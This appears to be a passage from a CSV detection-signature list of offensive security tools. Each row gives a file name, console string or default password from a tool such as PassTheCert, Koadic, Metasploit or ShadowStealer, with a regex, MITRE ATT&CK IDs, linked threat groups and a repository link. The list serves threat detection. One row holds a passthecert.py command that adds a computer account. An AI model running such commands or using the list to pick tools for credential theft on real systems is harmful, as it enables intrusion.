"*passphrase-rule2.rule*",".{0,1000}passphrase\-rule2\.rule.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54424" "*passphrase-wordlist*",".{0,1000}passphrase\-wordlist.{0,1000}","offensive_tool_keyword","passphrase-wordlist","This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. 
The rules will create over 1.000 permutations of each phase.","T1003 - T1110 - T1113 - T1137","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/initstring/passphrase-wordlist","1","0","N/A","N/A","N/A","10","1297","173","2025-04-12T07:58:51Z","2017-12-05T20:53:13Z","54425" "*PassSpray.ps1*",".{0,1000}PassSpray\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","54426" "*PassSpray: Valid Credentials Obtained!*",".{0,1000}PassSpray\:\sValid\sCredentials\sObtained!.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#content","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","54427" "*pass-station search tomcat*",".{0,1000}pass\-station\ssearch\stomcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54428" "*PassTheCert.csproj*",".{0,1000}PassTheCert\.csproj.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral 
Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","54429" "*PassTheCert.exe*",".{0,1000}PassTheCert\.exe.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","54430" "*PassTheCert.exe*",".{0,1000}PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","54431" "*passthecert.py -action add_computer -crt user.crt -key user.key -domain * -dc-ip *",".{0,1000}passthecert\.py\s\-action\sadd_computer\s\-crt\suser\.crt\s\-key\suser\.key\s\-domain\s.{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54432" 
"*passthecert.py*",".{0,1000}passthecert\.py.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","54433" "*Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)*",".{0,1000}Pass\-the\-Challenge\s\(PtC\)\s\-\sby\sOliver\sLyak\s\(ly4k\).{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54434" "*PassTheChallenge.cpp*",".{0,1000}PassTheChallenge\.cpp.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54435" "*PassTheChallenge.exe*",".{0,1000}PassTheChallenge\.exe.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54436" "*PassTheChallenge.pdb*",".{0,1000}PassTheChallenge\.pdb.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54437" 
"*PassTheChallenge.sln*",".{0,1000}PassTheChallenge\.sln.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54438" "*PassTheChallenge.vcxproj*",".{0,1000}PassTheChallenge\.vcxproj.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54439" "*PassTheHash(*",".{0,1000}PassTheHash\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","54440" "*passthehashbrowns/BOFMask*",".{0,1000}passthehashbrowns\/BOFMask.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","N/A","10","2","120","27","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z","54441" "*passthehashbrowns/SharpRDPThief*",".{0,1000}passthehashbrowns\/SharpRDPThief.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - 
T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","54442" "*passware-kit-forensic.sls*",".{0,1000}passware\-kit\-forensic\.sls.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54443" "*PasswareKitForensic_*_Setup.dmg*",".{0,1000}PasswareKitForensic_.{0,1000}_Setup\.dmg.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","#macos","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54444" "*PasswareKitForensic_*_Setup.msi*",".{0,1000}PasswareKitForensic_.{0,1000}_Setup\.msi.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54445" "*passware-kit-forensic-64bit.msi*",".{0,1000}passware\-kit\-forensic\-64bit\.msi.{0,1000}","offensive_tool_keyword","Passware Kit 
Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54446" "*PASSWORD = ""Letmein123!*",".{0,1000}PASSWORD\s\=\s\""Letmein123!.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","54448" "*password = 'b4bysh4rk'*",".{0,1000}password\s\=\s\'b4bysh4rk\'.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","54449" "*password = 'tdragon6'*",".{0,1000}password\s\=\s\'tdragon6\'.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","54450" "*Password confirmed. 
\nPoshito is welcoming you*",".{0,1000}Password\sconfirmed\.\s\\nPoshito\sis\swelcoming\syou.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#content","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","54451" "*Password Spraying EAS at https://*",".{0,1000}Password\sSpraying\sEAS\sat\shttps\:\/\/.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","54452" "*Password spraying lockout policy reset time *",".{0,1000}Password\sspraying\slockout\spolicy\sreset\stime\s.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","54453" "*Password spraying the following passwords: *",".{0,1000}Password\sspraying\sthe\sfollowing\spasswords\:\s.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","54454" "*Password spraying using paired usernames:passwords*",".{0,1000}Password\sspraying\susing\spaired\susernames\:passwords.{0,1000}","offensive_tool_keyword","o365spray","Username 
enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#content","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","54455" "*Password to use for ADWS Connection*",".{0,1000}Password\sto\suse\sfor\sADWS\sConnection.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","54456" "*Password*S0urce0fThePr0blem*",".{0,1000}Password.{0,1000}S0urce0fThePr0blem.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","54457" "*Password*S3cr3tS3rvic3*",".{0,1000}Password.{0,1000}S3cr3tS3rvic3.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","54458" "*Password*Winter2017*",".{0,1000}Password.{0,1000}Winter2017.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","54459" "*Password: 
socksPass*",".{0,1000}Password\:\ssocksPass.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","54460" "*Password:Waza1234*",".{0,1000}Password\:Waza1234.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","54461" "*password_box.py*",".{0,1000}password_box\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","54462" "*password_cracker.rb*",".{0,1000}password_cracker\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54463" "*password_crackers*",".{0,1000}password_crackers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54464" "*Password_Cracking.sh*",".{0,1000}Password_Cracking\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","54465" "*password_prompt_spoof.md*",".{0,1000}password_prompt_spoof\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54466" "*password|passwort|passwd|*",".{0,1000}password\|passwort\|passwd\|.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","54467" "*password|pwd|creds|cred|secret|userpw*",".{0,1000}password\|pwd\|creds\|cred\|secret\|userpw.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","54468" "*PASSWORD=miniosecret*",".{0,1000}PASSWORD\=miniosecret.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","54469" "*PasswordBoxImplant*",".{0,1000}PasswordBoxImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","54470" "*Password-Default/service.txt*",".{0,1000}Password\-Default\/service\.txt.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","54471" "*passwordfox.exe*",".{0,1000}passwordfox\.exe.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54472" "*passwordfox.zip*",".{0,1000}passwordfox\.zip.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54473" "*passwordfox-x64.zip*",".{0,1000}passwordfox\-x64\.zip.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54474" "*PasswordHashesView.exe*",".{0,1000}PasswordHashesView\.exe.{0,1000}","offensive_tool_keyword","PasswordHashesView","displays the SHA1 hash and the NTLM hash of the login password for users currently logged into your system","T1003 - T1081","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/alpha/passwordhashesview-x64.zip","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","54475" 
"*passwordhashesview.zip*",".{0,1000}passwordhashesview\.zip.{0,1000}","offensive_tool_keyword","PasswordHashesView","displays the SHA1 hash and the NTLM hash of the login password for users currently logged into your system","T1003 - T1081","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/alpha/passwordhashesview-x64.zip","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","54476" "*passwordhashesview-x64.zip*",".{0,1000}passwordhashesview\-x64\.zip.{0,1000}","offensive_tool_keyword","PasswordHashesView","displays the SHA1 hash and the NTLM hash of the login password for users currently logged into your system","T1003 - T1081","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/alpha/passwordhashesview-x64.zip","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","54477" "*password-hijaker.exe*",".{0,1000}password\-hijaker\.exe.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","54478" "*Passwords stolen and saved successfully!*",".{0,1000}Passwords\sstolen\sand\ssaved\ssuccessfully!.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","54479" "*Passwords to users complete. 
Please see cracked-users.txt*",".{0,1000}Passwords\sto\susers\scomplete\.\sPlease\ssee\scracked\-users\.txt.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","54480" "*Passwords/Leaked-Databases*.txt*",".{0,1000}Passwords\/Leaked\-Databases.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","54481" "*Passwords_in_description.txt*",".{0,1000}Passwords_in_description\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","54482" 